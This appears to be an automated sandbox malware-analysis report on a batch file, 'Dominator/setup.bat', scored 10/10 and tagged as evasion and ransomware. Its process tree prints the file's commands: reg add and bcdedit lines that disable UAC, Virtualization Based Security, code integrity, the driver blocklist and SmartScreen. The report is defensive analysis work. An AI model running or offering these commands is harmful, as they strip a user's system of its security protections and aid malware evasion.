79abbd6f55d763c6c0af8885cc573dcfaf36059822dc6f2db005242578e0909b

Analysis

max time kernel
155s
max time network
165s
platform
windows10-2004_x64
resource
win10v2004-20240226-en
resource tags

arch:x64arch:x86image:win10v2004-20240226-enlocale:en-usos:windows10-2004-x64system
submitted
12-03-2024 18:18

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Dominator/setup.bat
Size

1KB
MD5

79b066c8b719dee74dc5b74fec87808c
SHA1

497109077a04f04a39f1ab1c62095b7a0b9a0d8b
SHA256

af724b5016ba21fdd43078319a481cd97244fd33d08189d1971945036fcf4e7c
SHA512

34cb0b4eb82018c22889658d33df44aab32cd114c17cf3125cc71e2f7668956ff8f7a8b6a5688ecec496df6b91f72fe10b7c66fc8c39c947ecb1897f4dd56a17

Score

10^/10

evasion ransomware trojan

Malware Config

Signatures

UAC bypass 3 TTPs 1 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	reg.exe

Modifies boot configuration data using bcdedit 1 TTPs 1 IoCs

ransomware evasion

Inhibit System Recovery

T1490

pid	Process
1752	bcdedit.exe

Runs net.exe

Suspicious use of WriteProcessMemory 22 IoCs

description	pid	Process	procid_target
PID 4464 wrote to memory of 2632	4464	cmd.exe	97
PID 4464 wrote to memory of 2632	4464	cmd.exe	97
PID 2632 wrote to memory of 2340	2632	net.exe	98
PID 2632 wrote to memory of 2340	2632	net.exe	98
PID 4464 wrote to memory of 4024	4464	cmd.exe	99
PID 4464 wrote to memory of 4024	4464	cmd.exe	99
PID 4464 wrote to memory of 1156	4464	cmd.exe	100
PID 4464 wrote to memory of 1156	4464	cmd.exe	100
PID 4464 wrote to memory of 4292	4464	cmd.exe	101
PID 4464 wrote to memory of 4292	4464	cmd.exe	101
PID 4464 wrote to memory of 2380	4464	cmd.exe	102
PID 4464 wrote to memory of 2380	4464	cmd.exe	102
PID 4464 wrote to memory of 1044	4464	cmd.exe	103
PID 4464 wrote to memory of 1044	4464	cmd.exe	103
PID 4464 wrote to memory of 1788	4464	cmd.exe	104
PID 4464 wrote to memory of 1788	4464	cmd.exe	104
PID 4464 wrote to memory of 4864	4464	cmd.exe	105
PID 4464 wrote to memory of 4864	4464	cmd.exe	105
PID 4464 wrote to memory of 1996	4464	cmd.exe	106
PID 4464 wrote to memory of 1996	4464	cmd.exe	106
PID 4464 wrote to memory of 1752	4464	cmd.exe	107
PID 4464 wrote to memory of 1752	4464	cmd.exe	107

C:\Windows\system32\cmd.exe
C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\Dominator\setup.bat"
1⤵
- Suspicious use of WriteProcessMemory
PID:4464
- C:\Windows\system32\net.exe
  net session
  2⤵
  - Suspicious use of WriteProcessMemory
  PID:2632
- - C:\Windows\system32\net1.exe
    C:\Windows\system32\net1 session
    3⤵
    PID:2340
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverride /t REG_DWORD /d 3 /f
  2⤵
  PID:4024
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\Memory Management" /v FeatureSettingsOverrideMask /t REG_DWORD /d 3 /f
  2⤵
  PID:1156
- C:\Windows\system32\reg.exe
  reg add "HKLM\SYSTEM\CurrentControlSet\Control\CI\Config" /v VulnerableDriverBlocklistEnable /t REG_DWORD /d 0 /f
  2⤵
  PID:4292
- C:\Windows\system32\reg.exe
  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows\DeviceGuard" /v "EnableVirtualizationBasedSecurity" /t REG_DWORD /d 0 /f
  2⤵
  PID:2380
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\DeviceGuard\Scenarios\HypervisorEnforcedCodeIntegrity" /v "Enabled" /t REG_DWORD /d 0 /f
  2⤵
  PID:1044
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer" /v "SmartScreenEnabled" /t "REG_SZ" /d "Off" /f
  2⤵
  PID:1788
- C:\Windows\system32\reg.exe
  reg add "HKEY_CURRENT_USER\Software\Microsoft\Edge\SmartScreenEnabled" /v "" /t "REG_DWORD" /d 0 /f
  2⤵
  PID:4864
- C:\Windows\system32\reg.exe
  reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System" /v "EnableLUA" /t "REG_DWORD" /d 0 /f
  2⤵
  - UAC bypass
  PID:1996
- C:\Windows\system32\bcdedit.exe
  bcdedit /set hypervisorlaunchtype off
  2⤵
  - Modifies boot configuration data using bcdedit
  PID:1752

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1032 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:8
1⤵
PID:2500